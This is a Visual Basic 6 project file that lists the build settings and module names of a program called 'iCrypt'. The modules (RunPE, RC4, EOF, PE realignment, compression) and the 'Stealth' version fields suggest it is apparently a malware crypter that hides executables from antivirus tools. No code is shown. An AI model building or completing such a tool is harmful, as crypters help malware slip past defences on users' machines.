Type=Exe
Form=Form1.frm
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\..\Windows\SysWOW64\stdole2.tlb#OLE Automation
Module=mod_iCrypt; Module1.bas
Module=mod_Main; mod_Main.bas
Module=mod_Misc; mod_Misc.bas
Module=mod_RC4; mod_RC4.bas
Module=mod_RunPE; mod_RunPE.bas
Module=mod_API; mod_API.bas
Module=mod_Compress; mod_Compress.bas
Module=mod_EOF; mod_EOF.bas
Module=mPE_Realign; mPE_Realign.bas
Form=Form2.frm
ResFile32="iCrypt.RES"
IconForm="fMain"
Startup="fMain"
HelpFile=""
Title="iCrypt"
ExeName32="iCrypt.exe"
Command32=""
Name="iCrypt"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName="Stealth"
VersionLegalCopyright="FreshMeat"
CompilationType=-1
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
DebugStartupOption=0

[MS Transaction Server]
AutoRefresh=1
